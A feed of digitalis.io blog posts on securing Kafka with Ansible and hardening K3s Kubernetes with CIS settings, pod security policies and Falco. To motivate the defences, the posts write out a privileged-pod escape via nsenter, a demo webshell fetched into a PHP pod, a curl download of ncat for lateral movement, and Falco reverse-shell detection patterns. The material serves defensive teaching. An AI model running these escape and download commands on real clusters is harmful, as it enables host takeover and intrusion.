If you want to understand how to easily ingest data from Kafka topics into Cassandra than this blog can show you how with the DataStax Kafka Connector.
The post Kafka Installation and Security with Ansible – Topics, SASL and ACLs appeared first on digitalis.io.
]]>It is all too easy to create a Kafka cluster and let it be used as a streaming platform but how do you secure it for sensitive data? This blog will introduce you to some of the security features in Apache Kafka and provides a fully working project on Github for you to install, configure and secure a Kafka cluster.
If you would like to know more about how to implement modern data and cloud technologies into to your business, we at Digitalis do it all: from cloud and Kubernetes migration to fully managed services, we can help you modernize your operations, data, and applications – on-premises, in the cloud and hybrid.
We provide consulting and managed services on wide variety of technologies including Apache Kafka.
Contact us today for more information or to learn more about each of our services.
One of the many sections of Kafka that often gets overlooked is the management of topics, the Access Control Lists (ACLs) and Simple Authentication and Security Layer (SASL) components and how to lock down and secure a cluster. There is no denying it is complex to secure Kafka and hopefully this blog and associated Ansible project on Github should help you do this.
At Digitalis we focus on using tools that can automate and maintain our processes. ACLs within Kafka is a command line process but maintaining active users can become difficult as the cluster size increases and more users are added.
As such we have built an ACL and SASL manager which we have released as open source on the Digitalis Github repository. The URL is: https://github.com/digitalis-io/kafka_sasl_acl_manager
The Kafka, SASL and ACL Manager is a set of playbooks written in Ansible to manage:
Kafka is an open source project that provides a framework for storing, reading and analysing streaming data. Kafka was originally created at LinkedIn, where it played a part in analysing the connections between their millions of professional users in order to build networks between people. It was given open source status and passed to the Apache Foundation – which coordinates and oversees development of open source software – in 2011.
Being open source means that it is essentially free to use and has a large network of users and developers who contribute towards updates, new features and offering support for new users.
Kafka is designed to be run in a “distributed” environment, which means that rather than sitting on one user’s computer, it runs across several (or many) servers, leveraging the additional processing power and storage capacity that this brings.
Kafka ships with a pluggable Authorizer and an out-of-box authorizer implementation that uses zookeeper to store all the ACLs. Kafka ACLs are defined in the general format of “Principal P is [Allowed/Denied] Operation O From Host H On Resource R”.
Ansible is a configuration management and orchestration tool. It works as an IT automation engine.
Ansible can be run directly from the command line without setting up any configuration files. You only need to install Ansible on the control server or node. It communicates and performs the required tasks using SSH. No other installation is required. This is different from other orchestration tools like Chef and Puppet where you have to install software both on the control and client nodes.
Ansible uses configuration files called playbooks to perform a series of tasks.
The Java Authentication and Authorization Service (JAAS) was introduced as an optional package (extension) to the Java SDK.
JAAS can be used for two purposes:
Setup the inventories/hosts.yml to match your specific inventory
Setup the group_vars
For PLAINTEXT Authorisation set the following variables in group_vars/all.yml
kafka_listener_protocol: PLAINTEXT
kafka_inter_broker_listener_protocol: PLAINTEXT
kafka_allow_everyone_if_no_acl_found: ‘true’ #!IMPORTANT
For SASL_PLAINTEXT Authorisation set the following variables in group_vars/all.yml
configure_sasl: false
configure_acl: false
kafka_opts:
-Djava.security.auth.login.config=/opt/kafka/config/jaas.conf
kafka_listener_protocol: SASL_PLAINTEXT
kafka_inter_broker_listener_protocol: SASL_PLAINTEXT
kafka_sasl_mechanism_inter_broker_protocol: PLAIN
kafka_sasl_enabled_mechanisms: PLAIN
kafka_super_users: “User:admin” #SASL Admin User that has access to administer kafka.
kafka_allow_everyone_if_no_acl_found: ‘false’
kafka_authorizer_class_name: “kafka.security.authorizer.AclAuthorizer”
Once the above has been set as configuration for Kafka and Zookeeper you will need to configure and setup the topics and SASL users. For the SASL User list it will need to be set in the group_vars/kafka_brokers.yml . These need to be set on all the brokers and the play will configure the jaas.conf on every broker in a rolling fashion. The list is a simple YAML format username and password list. Please don’t remove the admin_user_password that needs to be set so that the brokers can communicate with each other. The default admin username is admin.
In the group_vars/all.yml there is a list called topics_acl_users. This is a 2-fold list that manages the topics to be created as well as the ACL’s that need to be set per topic.
There are 2 components to a topic and that is a user that can Produce to or Consume from a topic and the list splits that functionality also.
Example play:
ansible-playbook playbooks/base.yml -i inventories/hosts.yml -u root
Once the above has been set up the environment should be prepped with the basics for the Kafka and Zookeeper install to connect as root user and install and configure.
They can individually be toggled on or off with variables in the group_vars/all.yml
The variables have been set to use Opensource/Apache Kafka.
install_zookeeper_opensource: true
install_kafka_opensource: true
ansible-playbook playbooks/install_kafka_zkp.yml -i inventories/hosts.yml -u root
Once kafka has been installed then the last playbook needs to be run.
Based on either SASL_PLAINTEXT or PLAINTEXT configuration the playbook will
Please note that for ACL’s to work in Kafka there needs to be an authentication engine behind it.
If you want to install kafka to allow any connections and auto create topics please set the following configuration in the group_vars/all.yml
configure_topics: false
kafka_auto_create_topics_enable: true
This will disable the topic creation step and allow any topics to be created with the kafka defaults.
Once all the above topic and ACL config has been finalised please run:
ansible-playbook playbooks/configure_kafka.yml -i inventories/hosts.yml -u root
Steps
PLAIN TEXT
/opt/kafka/bin/kafka-console-consumer.sh –bootstrap-server $(hostname):9092 –topic metricbeat –group metricebeatCon1
SASL_PLAINTEXT
/opt/kafka/bin/kafka-console-consumer.sh –bootstrap-server $(hostname):9092 –consumer.config /opt/kafka/config/kafkaclient.jaas.conf –topic metricbeat –group metricebeatCon1
As part of the ACL play it will create a default kafkaclient.jaas.conf file as used in the examples above. This has the basic setup needed to connect to Kafka from any client using SASL_PLAINTEXT Authentication.
This project will give you an easily repeatable and more sustainable security model for Kafka.
The Ansbile playbooks are idempotent and can be run in succession as many times a day as you need. You can add and remove security and have a running cluster with high availability that is secure.
For any further assistance please reach out to us at Digitalis and we will be happy to assist.
If you want to understand how to easily ingest data from Kafka topics into Cassandra than this blog can show you how with the DataStax Kafka Connector.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
The post Kafka Installation and Security with Ansible – Topics, SASL and ACLs appeared first on digitalis.io.
]]>The post K3s – lightweight kubernetes made ready for production – Part 3 appeared first on digitalis.io.
]]>This is the final in a three part blog series on deploying k3s, a certified Kubernetes distribution from SUSE Rancher, in a secure and available fashion. In the part 1 we secured the network, host operating system and deployed k3s. In the second part of the blog we hardened the cluster further up to the application level. Now, in the final part of the blog we will leverage some great tools to create a security responsive cluster. Note, a fullying working Ansible project, https://github.com/digitalis-io/k3s-on-prem-production, has been made available to deploy and secure k3s for you.
If you would like to know more about how to implement modern data and cloud technologies, such as Kubernetes, into to your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on Kubernetes, cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.
In the previous blog we saw the huge benefits of tidying up our cluster and securing it following the best recommendations from the CIS Benchmark for Kubernetes. We also saw how we cannot cover everything, for example a bad actor stealing the administrator account token for the APIs.
Let’s recap the POD escaping technique used in the previous part using the administrator account
~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '
{
"spec": {
"hostPID": true,
"hostNetwork": true,
"containers": [
{
"name": "busybox",
"image": "alpine:3.7",
"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
"stdin": true,
"tty": true,
"resources": {"requests": {"cpu": "10m"}},
"securityContext": {
"privileged": true
}
}
]
}
}' --rm --attach
If you don't see a command prompt, try pressing enter.
[root@worker01 /]#
Not good. We could make a specific PSP disallowing for exec but that would hinder the internal use of the privileged account.
Is there anything else we can do?
No, not this one!
Falco is a cloud-native runtime security project, and is the de facto Kubernetes threat detection engine. Falco was created by Sysdig in 2016 and is the first runtime security project to join CNCF as an incubation-level project. Falco detects unexpected application behavior and alerts on threats at runtime.
And not only that, Falco will also monitor our system by parsing the Linux system calls from the kernel (either using a kernel module or eBPF) and uses its powerful rule engine to create alerts.
Installing it is pretty straightforward
- name: Install Falco repo /rpm-key
rpm_key:
state: present
key: https://falco.org/repo/falcosecurity-3672BA8F.asc
- name: Install Falco repo /rpm-repo
get_url:
url: https://falco.org/repo/falcosecurity-rpm.repo
dest: /etc/yum.repos.d/falcosecurity.repo
- name: Install falco on control plane
package:
state: present
name: falco
- name: Check if driver is loaded
shell: |
set -o pipefail
lsmod | grep falco
changed_when: no
failed_when: no
register: falco_module
We will install Falco directly on our hosts to have it separated from the kubernetes cluster, having a little more separation between the security layer and the application layer. It can also be installed quite easily as a DaemonSet using their official Helm Chart in case you do not have access to the underlying nodes.
Then we will configure Falco to talk with our APIs by modifying the service file
[Unit]
Description=Falco: Container Native Runtime Security
Documentation=https://falco.org/docs/
[Service]
Type=simple
User=root
ExecStartPre=/sbin/modprobe falco
ExecStart=/usr/bin/falco --pidfile=/var/run/falco.pid --k8s-api-cert=/etc/falco/token \
--k8s-api https://{{ keepalived_ip }}:6443 -pk
ExecStopPost=/sbin/rmmod falco
UMask=0077
# Rest of the file omitted for brevity
[...]
We will create an admin ServiceAccount and provide the token to Falco to authenticate it for the API calls.
We will install in the cluster Falco Sidekick, which is a simple daemon for enhancing available outputs for Falco. It takes a Falco event and forwards it to different outputs. For the sake of simplicity, we will just configure sidekick to notify us on Slack when something is wrong.
It works as a single endpoint for as many falco instances as you want:
In the inventory just set the following variable
falco_sidekick_slack: "https://hooks.slack.com/services/XXXXX-XXXX-XXXX"
# This is a secret and should be Vaulted!
Now let’s see what happens when we deploy the previous escaping POD
What can we do with it? We will deploy a python function that will be called by FalcoSidekick when something is happening.
Let’s deploy kubeless on our cluster following the task on roles/k3s-deploy/tasks/kubeless.yml or simply with the command
- $ kubectl apply -f https://github.com/kubeless/kubeless/releases/download/v1.0.8/kubeless-v1.0.8.yaml
And let’s not forget to create corresponding RoleBindings and PSPs for it as it will need some super power to run on our cluster.
After Kubeless deployment is completed we can proceed to deploy our function.
Let’s start simple and just react to a pod Attach or Exec
# code skipped for brevity
[ ...]
def pod_delete(event, context):
rule = event['data']['rule'] or None
output_fields = event['data']['output_fields'] or None
if rule and output_fields:
if (rule == "Attach/Exec Pod" or rule == "Create HostNetwork Pod"):
if output_fields['ka.target.name'] and output_fields[
'ka.target.namespace']:
pod = output_fields['ka.target.name']
namespace = output_fields['ka.target.namespace']
print(
f"Rule: \"{rule}\" fired: Deleting pod \"{pod}\" in namespace \"{namespace}\""
)
client.CoreV1Api().delete_namespaced_pod(
name=pod,
namespace=namespace,
body=client.V1DeleteOptions(),
grace_period_seconds=0
)
send_slack(
rule, pod, namespace, event['data']['output'],
time.time_ns()
)
Then deploy it to kubeless.
Let’s try our escaping POD from administrator account again
~ $ kubectl run hostname-sudo --restart=Never -it --image overriden --overrides '
{
"spec": {
"hostPID": true,
"hostNetwork": true,
"containers": [
{
"name": "busybox",
"image": "alpine:3.7",
"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
"stdin": true,
"tty": true,
"resources": {"requests": {"cpu": "10m"}},
"securityContext": {
"privileged": true
}
}
]
}
}' --rm --attach
If you don't see a command prompt, try pressing enter.
[root@worker01 /]#
We will receive this on Slack
And the POD is killed, and the process immediately exited. So we limited the damage by automatically responding in a fast manner to a fishy situation.
Falco will also keep an eye on the base host, if protected files are opened or strange processes spawned like network scanners.
Exposing our shiny new service running on our new cluster is not all sunshine and roses. We could have done all in our power to secure the cluster, but what if the services deployed in the cluster are vulnerable?
Here in this example we will deploy a PHP website that simulates the presence of a Remote Command Execution (RCE) vulnerability. Those are quite common and not to be underestimated.
Let’s deploy this simple service with our non-privileged user
apiVersion: apps/v1
kind: Deployment
metadata:
name: php
labels:
tier: backend
spec:
replicas: 1
selector:
matchLabels:
app: php
tier: backend
template:
metadata:
labels:
app: php
tier: backend
spec:
automountServiceAccountToken: true
securityContext:
runAsNonRoot: true
runAsUser: 1000
volumes:
- name: code
persistentVolumeClaim:
claimName: code
containers:
- name: php
image: php:7-fpm
volumeMounts:
- name: code
mountPath: /code
initContainers:
- name: install
image: busybox
volumeMounts:
- name: code
mountPath: /code
command:
- wget
- "-O"
- "/code/index.php"
- “https://raw.githubusercontent.com/alegrey91/systemd-service-hardening/master/ \
ansible/files/webshell.php”
The file demo/php.yaml will also contain the nginx container to run the app and an external ingress definition for it.
~ $ kubectl-user get pods,svc,ingress
NAME READY STATUS RESTARTS AGE
pod/nginx-64d59b466c-lm8ll 1/1 Running 0 3m9s
pod/php-66f85644d-2ffbt 1/1 Running 0 3m10s
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
service/nginx-php ClusterIP 10.44.38.54 <none> 8080/TCP 3m9s
service/php ClusterIP 10.44.98.87 <none> 9000/TCP 3m10s
NAME HOSTS ADDRESS PORTS AGE
ingress.networking.k8s.io/security-pod-ingress testweb.192.168.1.200.nip.io 192.168.1.200 80
Now let’s adapt our function to respond to a more varied selection of rules firing from Falco.
# code skipped for brevity
[ ...]
def pod_delete(event, context):
rule = event['data']['rule'] or None
output_fields = event['data']['output_fields'] or None
if rule and output_fields:
if (
rule == "Debugfs Launched in Privileged Container" or
rule == "Launch Package Management Process in Container" or
rule == "Launch Remote File Copy Tools in Container" or
rule == "Launch Suspicious Network Tool in Container" or
rule == "Mkdir binary dirs" or rule == "Modify binary dirs" or
rule == "Mount Launched in Privileged Container" or
rule == "Netcat Remote Code Execution in Container" or
rule == "Read sensitive file trusted after startup" or
rule == "Read sensitive file untrusted" or
rule == "Run shell untrusted" or
rule == "Sudo Potential Privilege Escalation" or
rule == "Terminal shell in container" or
rule == "The docker client is executed in a container" or
rule == "User mgmt binaries" or
rule == "Write below binary dir" or
rule == "Write below etc" or
rule == "Write below monitored dir" or
rule == "Write below root" or
rule == "Create files below dev" or
rule == "Redirect stdout/stdin to network connection" or
rule == "Reverse shell" or
rule == "Code Execution from TMP folder in Container" or
rule == "Suspect Renamed Netcat Remote Code Execution in Container"
):
if output_fields['k8s.ns.name'] and output_fields['k8s.pod.name']:
pod = output_fields['k8s.pod.name']
namespace = output_fields['k8s.ns.name']
print(
f"Rule: \"{rule}\" fired: Deleting pod \"{pod}\" in namespace \"{namespace}\""
)
client.CoreV1Api().delete_namespaced_pod(
name=pod,
namespace=namespace,
body=client.V1DeleteOptions(),
grace_period_seconds=0
)
send_slack(
rule, pod, namespace, event['data']['output'],
output_fields['evt.time']
)
# code skipped for brevity
[ ...]
Complete function file here roles/k3s-deploy/templates/kubeless/falco_function.yaml.j2
What can we do from here? Well first we could try and call the kubernetes APIs, but thanks to our previous hardening steps, anonymous querying is denied and ServiceAccount tokens automount is disabled.
But we can still try and poke around the network! The first thing is to use nmap to scan our network around and see if we can do any lateral movement. Let’s install it!
We cannot use the package manager? Well we can still download a statically linked precompiled binary to use inside the container! Let’s head to this repo: https://github.com/andrew-d/static-binaries/ we will find a healthy collection of tools that we can use to do naughty things!
Let’s use them, using this command in the webshell we will download netcat
curl https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x86_64/ncat \
--output nc
Let’s try using the above downloaded binary
We will rename it to unnamedbin, we can see that just launching it for an help, it really works
Custom rules in Falco are quite straightforward, they are written in yaml and not a DSL, and the documentation in https://falco.org/docs/ is exhaustive and clearly written
- rule: Suspect Renamed Netcat Remote Code Execution in Container
desc: Netcat Program runs inside container that allows remote code execution
condition: >
spawned_process and container and
((proc.args contains "ash" or
proc.args contains "bash" or
proc.args contains "csh" or
proc.args contains "ksh" or
proc.args contains "/bin/sh" or
proc.args contains "tcsh" or
proc.args contains "zsh" or
proc.args contains "dash") and
(proc.args contains "-e" or
proc.args contains "-c" or
proc.args contains "--sh-exec" or
proc.args contains "--exec" or
proc.args contains "-c " or
proc.args contains "--lua-exec"))
output: >
Suspect Reverse shell using renamed netcat runs inside container that allows remote code execution (user=%user.name user_loginuid=%user.loginuid
command=%proc.cmdline container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
priority: WARNING
tags: [network, process, mitre_execution]
There’s no perfect security, the rule is simple “If it’s connected, it’s vulnerable.”
So it’s our job to always keep an eye on our clusters, enable monitoring and alerting and groom our set of rules over time, that will make the cluster smarter in dangerous situations, or simply by alerting us of new things.
This series is not covering other important parts of your application lifecycle, like Docker Image Scanning, Sonarqube integration in your CI/CD pipeline to try and not have vulnerable applications in the cluster in the first place, and operation activities during your cluster lifecycle like defining Network Policies for your deployments and correctly creating Cluster Roles with the “principle of least privilege” always in mind.
This series of posts should give you an idea of the best practices (always evolving) and the risks and responsibilities you have when deploying kubernetes on-premises server room. If you would like help, please reach out!
All the playbook is available in the repo on https://github.com/digitalis-io/k3s-on-prem-production
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
Do you want to know securely deploy k3s kubernetes for production? Have a read of this blog and accompanying Ansible project for you to run.
The post K3s – lightweight kubernetes made ready for production – Part 3 appeared first on digitalis.io.
]]>The post K3s – lightweight kubernetes made ready for production – Part 2 appeared first on digitalis.io.
]]>This is part 2 in a three part blog series on deploying k3s, a certified Kubernetes distribution from SUSE Rancher, in a secure and available fashion. In the previous blog we secured the network, host operating system and deployed k3s. Note, a fullying working Ansible project, https://github.com/digitalis-io/k3s-on-prem-production, has been made available to deploy and secure k3s for you.
If you would like to know more about how to implement modern data and cloud technologies, such as Kubernetes, into to your business, we at Digitalis do it all: from cloud migration to fully managed services, we can help you modernize your operations, data, and applications. We provide consulting and managed services on Kubernetes, cloud, data, and DevOps for any business type. Contact us today for more information or learn more about each of our services here.
So we have a running K3s cluster, are we done yet (see part 1)? Not at all!
We have secured the underlying machines and we have secured the network using strong segregation, but how about the cluster itself? There is still alot to think about and handle, so let’s take a look at some dangerous patterns.
Let’s suppose we want to give someone the edit cluster role permission so that they can deploy pods, but obviously not an administrator account. We expect the account to be just able to stay in its own namespace and not harm the rest of the cluster, right?
Let’s create the user:
~ $ kubectl create namespace unprivileged-user
~ $ kubectl create serviceaccount -n unprivileged-user fake-user
~ $ kubectl create rolebinding -n unprivileged-user fake-editor --clusterrole=edit \
--serviceaccount=unprivileged-user:fake-user
Obviously the user cannot do much outside of his own namespace
~ $ kubectl-user get pods -A
Error from server (Forbidden): pods is forbidden: User "system:serviceaccount:unprivileged-user:fake-user" cannot list resource "pods" in API group "" at the cluster scope
But let’s say we want to deploy a privileged POD? Are we allowed to? Let’s deploy this
apiVersion: apps/v1
kind: Deployment
metadata:
labels:
app: privileged-deploy
name: privileged-deploy
spec:
replicas: 1
selector:
matchLabels:
app: privileged-deploy
template:
metadata:
labels:
app: privileged-deploy
spec:
containers:
- image: alpine
name: alpine
stdin: true
tty: true
securityContext:
privileged: true
hostPID: true
hostNetwork: true
This will work flawlessly, and the POD has hostPID, hostNetwork and runs as root.
~ $ kubectl-user get pods -n unprivileged-user
NAME READY STATUS RESTARTS AGE
privileged-deploy-8878b565b-8466r 1/1 Running 0 24m
What can we do now? We can do some nasty things!
Let’s analyse the situation. If we enter the POD, we can see that we have access to all the Host’s processes (thanks to hostPID) and the main network (thanks to hostNetwork).
~ $ kubectl-user exec -ti -n unprivileged-user privileged-deploy-8878b565b-8466r -- sh
/ # ps aux | head -n 5
PID USER TIME COMMAND
1 root 0:05 /usr/lib/systemd/systemd --switched-root --system --deserialize 16
574 root 0:01 /usr/lib/systemd/systemd-journald
605 root 0:00 /usr/lib/systemd/systemd-udevd
631 root 0:02 /sbin/auditd
/ # ip addr | head -n 10
1: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq state UP qlen 1000
link/ether 56:2f:49:03:90:d0 brd ff:ff:ff:ff:ff:ff
inet 192.168.122.21/24 brd 192.168.122.255 scope global eth0
valid_lft forever preferred_lft forever
Having root access, we can use the command nsenter to run programs in different namespaces. Which namespace you ask? Well we can use the namespace of PID 1!
/ # nsenter --mount=/proc/1/ns/mnt --net=/proc/1/ns/net --ipc=/proc/1/ns/ipc \
--uts=/proc/1/ns/uts --cgroup=/proc/1/ns/cgroup -- sh -c /bin/bash
[root@worker01 /]#
So now we are root on the host node. We escaped the pod and are now able to do whatever we want on the node.
This obviously is a huge hole in the cluster security, and we cannot put the cluster in the hands of anyone and just rely on their good will! Let’s try to set up the cluster better using the CIS Security Benchmark for Kubernetes.
A notable mention to K3s is that it already has a number of security mitigations applied and turned on by default and will pass a number of the Kubernetes CIS controls without modification. Which is a huge plus for us!
We will follow the cluster hardening task in the accompanying Github project roles/k3s-deploy/tasks/cluster_hardening.yml
File permissions are already well set with K3s, but a simple task to ensure files and folders are respectively 0600 and 0700 ensures following the CIS Benchmark rules from 1.1.1 to 1.1.21 (File Permissions)
# CIS 1.1.1 to 1.1.21
- name: Cluster Hardening - Ensure folder permission are strict
command: |
find {{ item }} -not -path "*containerd*" -exec chmod -c go= {} \;
register: chmod_result
changed_when: "chmod_result.stdout != \"\""
with_items:
- /etc/rancher
- /var/lib/rancher
Digging deeper we will first harden our Systemd Service using the isolation capabilities it provides:
File: /etc/systemd/system/k3s-server.service and /etc/systemd/system/k3s-agent.service
### Full configuration not displayed for brevity
[...]
###
# Sandboxing features
{%if 'libselinux' in ansible_facts.packages %}
AssertSecurity=selinux
ConditionSecurity=selinux
{% endif %}
LockPersonality=yes
PrivateTmp=yes
ProtectHome=yes
ProtectHostname=yes
ProtectKernelLogs=yes
ProtectKernelTunables=yes
ProtectSystem=full
ReadWriteDirectories=/var/lib/ /var/run /run /var/log/ /lib/modules /etc/rancher/
This will prevent the spawned process from having write access outside of the designated directories, protects the rest of the system from unwanted reads, protects the Kernel Tunables and Logs and sets up a private Home and TMP directory for the process.
This ensures a minimum layer of isolation between the process and the host. A number of modifications on the host system will be needed to ensure correct operation, in particular setting up sysctl flags that would have been modified by the process instead.
vm.panic_on_oom=0
vm.overcommit_memory=1
kernel.panic=10
kernel.panic_on_oops=1
File: /etc/sysctl.conf
After this we will be sure that the K3s process will not modify the underlying system. Which is a huge win by itself
We are now on the application level, and here K3s comes to meet us being already set up with sane defaults for file permissions and service setups.
SSL, in an appropriate environment should comply with the Federal Information Processing Standard (FIPS) Publication 140-2
--kube-apiserver-arg=tls-min-version=VersionTLS12 \
--kube-apiserver-arg=tls-cipher-suites=TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,TLS_RSA_WITH_AES_128_GCM_SHA256,TLS_RSA_WITH_AES_256_GCM_SHA384 \
File: /etc/systemd/system/k3s-server.service
--kubelet-arg=tls-cipher-suites=TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,TLS_RSA_WITH_AES_128_GCM_SHA256,TLS_RSA_WITH_AES_256_GCM_SHA384 \
File: /etc/systemd/system/k3s-server.service and /etc/systemd/system/k3s-agent.service
Where etcd encryption is used, it is important to ensure that the appropriate set of encryption providers is used.
--kube-apiserver-arg='encryption-provider-config=/etc/k3s-encryption.yaml' \
File: /etc/systemd/system/k3s-server.service
apiVersion: apiserver.config.K8s.io/v1
kind: EncryptionConfiguration
resources:
- resources:
- secrets
providers:
- aescbc:
keys:
- name: key1
secret: {{ k3s_encryption_secret }}
- identity: {}
File: /etc/k3s-encryption.yaml
To generate an encryption secret just run
~ $ head -c 32 /dev/urandom | base64
The runtime requirements to comply with the CIS Benchmark are centered around pod security (PSPs) and network policies. By default, K3s runs with the “NodeRestriction” admission controller. With the following we will enable all the Admission Plugins requested by the CIS Benchmark compliance:
--kube-apiserver-arg='enable-admission-plugins=AlwaysPullImages,DefaultStorageClass,DefaultTolerationSeconds,LimitRanger,MutatingAdmissionWebhook,NamespaceLifecycle,NodeRestriction,PersistentVolumeClaimResize,PodSecurityPolicy,Priority,ResourceQuota,ServiceAccount,TaintNodesByCondition,ValidatingAdmissionWebhook' \
File: /etc/systemd/system/k3s-server.service
Auditing the Kubernetes API Server provides a security-relevant chronological set of records documenting the sequence of activities that have affected system by individual users, administrators or other components of the system
--kube-apiserver-arg=audit-log-maxage=30 \
--kube-apiserver-arg=audit-log-maxbackup=30 \
--kube-apiserver-arg=audit-log-maxsize=30 \
--kube-apiserver-arg=audit-log-path=/var/lib/rancher/audit/audit.log \
File: /etc/systemd/system/k3s-server.service
If –service-account-lookup is not enabled, the apiserver only verifies that the authentication token is valid, and does not validate that the service account token mentioned in the request is actually present in etcd. This allows using a service account token even after the corresponding service account is deleted. This is an example of time of check to time of use security issue.
Also APIs should never allow anonymous querying on either the apiserver or kubelet side.
--node-taint CriticalAddonsOnly=true:NoExecute \
File: /etc/systemd/system/k3s-server.service
By default K3s does not distinguish between control-plane and nodes like full kubernetes does, and does schedule PODs even on master nodes.
This is not recommended on a production multi-node and multi-master environment so we will prevent this adding the following flag
--kube-apiserver-arg='service-account-lookup=true' \
--kube-apiserver-arg=anonymous-auth=false \
--kubelet-arg='anonymous-auth=false' \
--kube-controller-manager-arg='use-service-account-credentials=true' \
--kube-apiserver-arg='request-timeout=300s' \
--kubelet-arg='streaming-connection-idle-timeout=5m' \
--kube-controller-manager-arg='terminated-pod-gc-threshold=10' \
File: /etc/systemd/system/k3s-server.service
We now have a quite well set up cluster both node-wise and service-wise, but are we done yet?
Not really, we have auditing and we have enabled a bunch of admission controllers, but the previous deployment still works because we are still missing an important piece of the puzzle.
First we will create a system-unrestricted PSP, this will be used by the administrator account and the kube-system namespace, for the legitimate privileged workloads that can be useful for the cluster.
Let’s define it in roles/k3s-deploy/files/policy/system-psp.yaml
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: system-unrestricted-psp
spec:
privileged: true
allowPrivilegeEscalation: true
allowedCapabilities:
- '*'
volumes:
- '*'
hostNetwork: true
hostPorts:
- min: 0
max: 65535
hostIPC: true
hostPID: true
runAsUser:
rule: 'RunAsAny'
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'RunAsAny'
fsGroup:
rule: 'RunAsAny'
So we are allowing PODs with this PSP to be run as root and can have hostIPC, hostPID and hostNetwork.
This will be valid only for cluster-nodes and for kube-system namespace, we will define the corresponding CusterRole and ClusterRoleBinding for these entities in the playbook.
For the rest of the users and namespaces we want to limit the PODs capabilities as much as possible. We will provide the following PSP in roles/k3s-deploy/files/policy/restricted-psp.yaml
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: global-restricted-psp
annotations:
seccomp.security.alpha.kubernetes.io/allowedProfileNames: 'docker/default,runtime/default' # CIS - 5.7.2
seccomp.security.alpha.kubernetes.io/defaultProfileName: 'runtime/default' # CIS - 5.7.2
spec:
privileged: false # CIS - 5.2.1
allowPrivilegeEscalation: false # CIS - 5.2.5
requiredDropCapabilities: # CIS - 5.2.7/8/9
- ALL
volumes:
- 'configMap'
- 'emptyDir'
- 'projected'
- 'secret'
- 'downwardAPI'
- 'persistentVolumeClaim'
forbiddenSysctls:
- '*'
hostPID: false # CIS - 5.2.2
hostIPC: false # CIS - 5.2.3
hostNetwork: false # CIS - 5.2.4
runAsUser:
rule: 'MustRunAsNonRoot' # CIS - 5.2.6
seLinux:
rule: 'RunAsAny'
supplementalGroups:
rule: 'MustRunAs'
ranges:
- min: 1
max: 65535
fsGroup:
rule: 'MustRunAs'
ranges:
- min: 1
max: 65535
readOnlyRootFilesystem: false
We are now disallowing privileged containers, hostPID, hostIPD and hostNetwork, we are forcing the container to run with a non-root user and applying the default seccomp profile for docker containers, whitelisting only a restricted and well-known amount of syscalls in them.
We will create the corresponding ClusterRole and ClusterRoleBindings in the playbook, enforcing this PSP to any system:serviceaccounts, system:authenticated and system:unauthenticated.
We also want to disable automountServiceAccountToken for all namespaces. By default kubernetes enables it and any POD will mount the default service account token inside it in /var/run/secrets/kubernetes.io/serviceaccount/token. This is also dangerous as reading this will automatically give the attacker the possibility to query the kubernetes APIs being authenticated.
To remediate we simply run
- name: Fetch namespace names
shell: |
set -o pipefail
{{ kubectl_cmd }} get namespaces -A | tail -n +2 | awk '{print $1}'
changed_when: no
register: namespaces
# CIS - 5.1.5 - 5.1.6
- name: Security - Ensure that default service accounts are not actively used
command: |
{{ kubectl_cmd }} patch serviceaccount default -n {{ item }} -p \
'automountServiceAccountToken: false'
register: kubectl
changed_when: "'no change' not in kubectl.stdout"
failed_when: "'no change' not in kubectl.stderr and kubectl.rc != 0"
run_once: yes
with_items: "{{ namespaces.stdout_lines }}"
In the end the cluster will adhere to the following CIS ruling
So now we have a cluster that is also fully compliant with the CIS Benchmark for Kubernetes. Did this have any effect?
Let’s try our POD escaping again
~ $ kubectl-user apply -f demo/privileged-deploy.yaml
deployment.apps/privileged-deploy created
~ $ kubectl-user get pods
No resources found in unprivileged-user namespace.
~ $ kubectl-user get rs
NAME DESIRED CURRENT READY AGE
privileged-deploy-8878b565b 1 0 0 108s
~ $ kubectl-user describe rs privileged-deploy-8878b565b | tail -n8
Conditions:
Type Status Reason
---- ------ ------
ReplicaFailure True FailedCreate
Events:
Type Reason Age From Message
---- ------ ---- ---- -------
Warning FailedCreate 54s (x15 over 2m16s) replicaset-controller Error creating: pods "privileged-deploy-8878b565b-" is forbidden: PodSecurityPolicy: unable to admit pod: [spec.securityContext.hostNetwork: Invalid value: true: Host network is not allowed to be used spec.securityContext.hostPID: Invalid value: true: Host PID is not allowed to be used spec.containers[0].securityContext.privileged: Invalid value: true: Privileged containers are not allowed]
So the POD is not allowed, PSPs are working!
We can even try this command that will not create a Replica Set but directly a POD and attach to it.
~ $ kubectl-user run hostname-sudo --restart=Never -it --image overriden --overrides '
{
"spec": {
"hostPID": true,
"hostNetwork": true,
"containers": [
{
"name": "busybox",
"image": "alpine:3.7",
"command": ["nsenter", "--mount=/proc/1/ns/mnt", "--", "sh", "-c", "exec /bin/bash"],
"stdin": true,
"tty": true,
"resources": {"requests": {"cpu": "10m"}},
"securityContext": {
"privileged": true
}
}
